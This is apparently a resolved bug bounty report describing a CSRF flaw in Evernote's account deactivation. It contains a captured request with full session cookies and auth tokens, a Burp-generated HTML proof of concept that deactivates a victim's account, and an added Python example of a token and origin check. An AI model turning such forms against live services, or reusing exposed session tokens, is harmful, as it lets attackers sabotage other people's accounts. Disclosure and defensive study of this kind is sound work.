CSRF leads to account deactivation of users

Medium
Evernote
Submitted None
Reported by sampritdas

Vulnerability Details

Technical details and impact analysis

Steps to reproduce the vulnerability:

1) Create two accounts: one for the attacker and one for the victim.
2) With the attacker account, go to https://www.evernote.com/secure/CloseAccount.action
3) Open Burp Suite. When you press "Deactivate your Evernote account" you will see another popup, "Before you go, we recommend..."; just check "reviewed" and continue.
4) Select why you want to deactivate, then press "Deactivate account".
5) Capture the request with Burp Suite intercept on.
6) The request will look like this:

```http
POST /secure/CloseAccount.action?accountAction=deactivateAccount&json=true HTTP/1.1
Host: www.evernote.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
Origin: https://www.evernote.com
Connection: close
Referer: https://www.evernote.com/secure/CloseAccount.action
Cookie: web50017PreUserGuid=03325c9c-10bb-4705-a4db-08fde2343592; cookieTestValue=1615353230618; JSESSIONID=761EB90EE2758BBF63CDDD3D14D0DC97; userdata_lastLoginTime=1615353238172; userdata_accountType=BASIC; userdata_acctCreatedTime=1615353237000; lastAuthentication=1615353238363/8690e8a01b1354ef467f4db8066ea718; Ue9i0JAw=AK6vKhp4AQAAxbQuLjpIXLkJispAAhdLVUZDhggqGkbuCWLCXGuv2aD-bibs; last-web-version-used=Ion-on-Conduit; promoCode=86fe54e944118fc779bacb7705f6bb40; optimizelyEndUserId=oeu1615346790816r0.5547674269987128; iterableEndUserId=xacoyi5848%40nobitcoin.net; iterableEmailCampaignId=1406900; iterableTemplateId=1952543; iterableMessageId=31ec3758a6e446caa50aa9378227df08; EB_Partial_Sign_Up_Email_Capture_Variant=B_PartialCapture; WEB_51151_EB_Sign_Up_Zendesk_Chat_Variant=A_Control; _dd_s=logs=1&id=544a2ceb-8bca-4321-9826-588de3b14daf&created=1615352249296&expire=1615354270436; auth="S=s417:U=d645f78:E=1781ac54117:C=1781a8e529b:P=5fd:A=en-web:V=2:H=f7a20a70086b721eb3990baf142c7c9d"; userdata_loggedIn=true; clipper-sso="S=s417:U=d645f78:E=17f723f7ea4:C=1781a8e52a5:P=1d5:A=en-chrome-clipper-xauth-new:V=2:H=4c1ac923c3fa5f2f5f36681ac30a0ecb"; req_sec="U=d645f78:P=/:E=1781a9d4be9:S=bd223e7b10ca33bccfc72769f7584122"
Sec-GPC: 1

password=&oneTimeCode=&captchaResponse=&reasons%5Banalytic%5D=specify-reason-different-app&reasons%5Bi18nKey%5D=CloseAccountAction.accountActionSurvey.differentApp&reasons%5Bchecked%5D=true&otherReason=
```

7) Right-click the request, go to Engagement Tools, then Generate CSRF PoC, and click Copy HTML.
8) The CSRF PoC will look like this:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.evernote.com/secure/CloseAccount.action?accountAction=deactivateAccount&json=true" method="POST">
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="oneTimeCode" value="" />
      <input type="hidden" name="captchaResponse" value="" />
      <input type="hidden" name="reasons&#91;analytic&#93;" value="specify&#45;reason&#45;different&#45;app" />
      <input type="hidden" name="reasons&#91;i18nKey&#93;" value="CloseAccountAction&#46;accountActionSurvey&#46;differentApp" />
      <input type="hidden" name="reasons&#91;checked&#93;" value="true" />
      <input type="hidden" name="otherReason" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

9) Create a file named Csrf.html, paste the HTML PoC into it, and save it.
10) When the attacker sends this HTML file to the victim and the victim opens it, the victim's account gets deactivated.

Video PoC link: https://drive.google.com/file/d/12IJOyqVxIOqG_vTWKVJ3qwG7GTn-fV-f/view?usp=sharing

## Impact

An attacker can deactivate victims' premium accounts, and you will lose good customers because of this security flaw.
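The deactivation endpoint above accepts a cookie-authenticated POST with no anti-CSRF token and no check of where the request came from, which is why the generated form works. As an added example (not code from the report or from Evernote), here is the server-side check that would have refused that form post: a synchronizer token bound to the session plus an Origin/Referer check; note that the captured request shows `Origin: https://www.evernote.com` only because it was recorded from the real page, whereas a form submitted from a page on another site is stamped by the browser with that site's origin. The function names, the `csrfToken` field and the sample bodies are assumptions constructed for the example.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

ALLOWED_ORIGIN = "https://www.evernote.com"  # the only origin that serves the form

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the server-side session (synchronizer token pattern)."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def _source_origin(headers: dict) -> Optional[str]:
    """Origin header if present, else scheme+host of Referer, else None."""
    if headers.get("Origin"):
        return headers["Origin"]
    if headers.get("Referer"):
        parts = urlsplit(headers["Referer"])
        return f"{parts.scheme}://{parts.netloc}"
    return None

def check_state_change(headers: dict, body: str, session: dict) -> Tuple[bool, str]:
    """Allow a cookie-authenticated POST only if it comes from our own origin AND
    carries the per-session token that a form on a third-party page cannot know."""
    source = _source_origin(headers)
    if source != ALLOWED_ORIGIN:
        return False, f"origin check failed: {source!r}"
    form = parse_qs(body, keep_blank_values=True)
    submitted = form.get("csrfToken", [""])[0]
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "csrf token missing or invalid"
    return True, "ok"

# Constructed sample data: a victim session, a legitimate body and the PoC form's body.
VICTIM_SESSION = {"user": "victim"}
TOKEN = issue_csrf_token(VICTIM_SESSION)
LEGIT_BODY = f"password=&oneTimeCode=&reasons%5Bchecked%5D=true&csrfToken={TOKEN}"
POC_BODY = "password=&oneTimeCode=&captchaResponse=&reasons%5Bchecked%5D=true&otherReason="

def demo() -> Tuple[Tuple[bool, str], Tuple[bool, str]]:
    """Legitimate same-origin submission passes; the cross-site PoC post is refused."""
    legit = check_state_change({"Origin": ALLOWED_ORIGIN}, LEGIT_BODY, VICTIM_SESSION)
    # The browser stamps a form posted from the attacker's page with that page's origin.
    poc = check_state_change({"Origin": "https://attacker.example"}, POC_BODY, VICTIM_SESSION)
    return legit, poc
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a second, browser-enforced layer, but the token check is what makes the endpoint safe regardless of client behaviour.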

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$300.00

Submitted